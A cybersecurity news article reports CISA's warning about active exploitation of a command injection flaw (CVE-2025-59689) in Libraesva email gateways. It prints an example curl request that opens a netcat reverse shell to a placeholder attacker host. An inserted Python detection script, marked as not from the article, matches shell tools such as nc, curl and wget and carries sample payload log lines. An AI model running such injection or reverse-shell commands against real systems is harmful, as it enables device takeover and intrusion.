CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks

In late September 2025, the Cybersecurity and Infrastructure Security Agency (CISA) issued a public alert regarding the active exploitation of a critical command injection vulnerability tracked as CVE-2025-59689 in Libraesva Email Security Gateway (ESG) devices.

This flaw has rapidly emerged as a favored target for threat actors due to its ease of exploitation and the wide deployment of Libraesva ESG as a frontline defense in corporate and government email infrastructure.

The vulnerability allows unauthenticated attackers to execute arbitrary system commands on affected appliances, resulting in a significant risk of email compromise, data exfiltration, and lateral movement within networks.

Initial discovery of this security weakness surfaced after multiple security firms observed anomalous traffic directed at public-facing ESG appliances across Europe and North America.

Attackers quickly weaponized proof-of-concept exploits, taking advantage of the flaw’s simple payload delivery—typically through a crafted HTTP POST request to an exposed management interface.

Organizations relying on Libraesva ESG appliances for spam and phishing defense are directly at risk, with exploitation frequently resulting in full device takeover.

CISA analysts noted that attackers leveraging CVE-2025-59689 did so with high speed and stealth, leaving minimal traces in security logs.

Their investigations revealed that successful exploitation permitted payloads enabling remote shell access, installation of additional malware packages, and use of the ESG appliance as a pivot point for internal reconnaissance.

Notably, CISA documented several incidents where attackers deployed reverse shells to establish persistent access channels post-compromise.

The infection mechanism at the heart of CVE-2025-59689 is a classic OS command injection. An attacker submits a specially crafted request to the web-based management API with command payloads embedded in user-supplied parameters.

For example:

curl -X POST "https://target-esg/management/api[.]php" -d '[cmd]=;nc -e /bin/bash attacker[.]com 4444'

This command illustrates how the flaw enables an external actor to spawn a remote shell directly to the attacker’s system, bypassing authentication controls.
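As an added example (not code from the article or from Libraesva), the following Python check flags the request pattern described above in constructed proxy-style request logs: a POST to the management API whose parameter value carries shell metacharacters or command-chaining tokens. The log format, the /management/ path prefix and the parameter name are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample of reverse-proxy request logs (not real Libraesva logs):
# "<client-ip> <method> <path> <url-encoded form body>"
SAMPLE_LOG = """\
203.0.113.7 POST /management/api.php cmd=%3Bnc+-e+%2Fbin%2Fbash+attacker.example+4444
198.51.100.2 POST /management/api.php cmd=status
192.0.2.9 GET /login.php user=admin
203.0.113.7 POST /management/api.php cmd=list%7Ccat+%2Fetc%2Fpasswd
"""

# Shell metacharacters used to chain commands, plus common tools seen in
# injected payloads (matched as whole words so "status" does not trip "sh").
META = re.compile(r"[;|&`$]|\b(?:nc|ncat|bash|sh|curl|wget|python)\b")

def is_suspicious_request(method: str, path: str, body: str) -> bool:
    """True when a POST to the management API (assumed path prefix) carries
    any parameter value containing shell metacharacters or chaining tokens."""
    if method != "POST" or not path.startswith("/management/"):
        return False
    params = parse_qs(body, keep_blank_values=True)  # decodes %XX and '+'
    return any(META.search(v) for values in params.values() for v in values)

def find_injection_attempts(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client, path, decoded body) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # malformed or body-less line; nothing to inspect
        client, method, path, body = parts
        if is_suspicious_request(method, path, body):
            hits.append((client, path, unquote_plus(body)))
    return hits

if __name__ == "__main__":
    for client, path, body in find_injection_attempts(SAMPLE_LOG):
        print(f"ALERT {client} {path} {body}")
```

Feed the same check with your proxy or WAF logs and group hits by client to spot repeated attempts; a single hit from an address that never authenticated is already worth triage.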

CISA researchers found that many incidents occurred due to ESG appliances lacking recent security updates, underscoring the necessity for timely patching.

Figure: the Libraesva ESG exploit flow, beginning with external payload delivery and culminating in command execution and attacker control.

The continued exploitation of CVE-2025-59689 reinforces the importance of robust patch management and vigilant monitoring of security infrastructure for signs of compromise.

The post CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.